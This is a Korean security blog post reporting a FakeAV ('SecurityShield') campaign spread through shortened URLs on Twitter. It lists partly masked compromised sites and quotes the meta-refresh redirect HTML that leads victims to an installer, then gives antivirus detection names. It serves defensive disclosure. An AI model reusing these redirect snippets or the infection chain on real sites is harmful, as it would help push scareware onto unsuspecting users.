반응형
외국에서 어제날짜(1월 20일)로 트위터에서 단축URL(Short URL)을 통해 FakeAV가 전파되고 있다고 보고했다.
- 외국 보고자료
외국자료에 의하면 다음과 같이 SNS의 대표주자인 트위터를 통해 단축URL로 전파된다고 한다.
해당 단축URL에 접근하면 다음과 같은 m28sx.html로 이동한다.
http://cainno****a.it/m28sx.html
http://serviz****ittadino.it/m28sx.html
http://ai**.fr/m28sx.html
http://lowc****oiffure.fr/m28sx.html
http://s15248477.online****-server.info/m28sx.html
http://www.waseet****e.com/m28sx.html
http://www.ge****.ee/m28sx.html
m28sx.html 파일은 red.php 라는 페이지로 이동시킨다.
<head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://gdfgdfgdg******.in.ua/undo/red.php">
</head>
red.php에는 BASE64로 코딩 된 페이지에 의해 FakeAV인 SecurityShield 프로그램이 설치 된다.
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="refresh"
content="0; url=http://91.193.***.**/index.php?1d=V8216F2680&F2=K34YA1MT40MY23EKK5Z83H592UUJNRh&T8oY=RAXWwmJS03MR0vVDFZU0&2vh=23OAQVVB&q89=
ES2QlAgQ2VVNWBVV7&A6kcl=7&tBM=(중간생략)AitJCAABBwQOcgYHAURXQDs%3D&bOk=otNlBUJkhOAwI&j1=AGnN7B
mZgBWIfZw8%2BBDk&5S=QB99C422014BO6HQ3V1U7B5E5&479lM=F0M263&AwT=PY23P46201H9&qg43=C3sHV2x" />
</head>
<body></body>
</html>
- 설치 과정 스크린샷
현재 알약에서는 V.TRJ.FakeAV.SecurityShield, V.TRJ.HTML.Redirect 로 탐지 중이니, 알약 프로그램을 최신으로 업데이트 하시길 바란다.
'IT 보안소식' 카테고리의 다른 글
| 카스퍼스키(Kaspersky), Kaspersky Anti-Virus 소스코드 유출 사고 (6) | 2011.01.30 |
|---|---|
| 방송통신위원회 & 한국인터넷진흥원, '2010년도 하반기 '악성코드 제거 프로그램' 실태조사 결과 (2) | 2011.01.22 |
| 아이폰 5(iPhone 5), "아이폰 5"로 추정 되는 사진 인터넷 유출!! (0) | 2011.01.07 |
| 올바른 기사 캠페인 - (민중의소리) 초간단 좀비PC 확인법? 숫자 8080이 뜨면 좀비 확실!<수정완료> (3) | 2011.01.07 |
| KBS1 TV, 신년특집다큐 "좀비 PC, 당신을 노린다" 를 시청 후 방송요약 (6) | 2011.01.07 |
댓글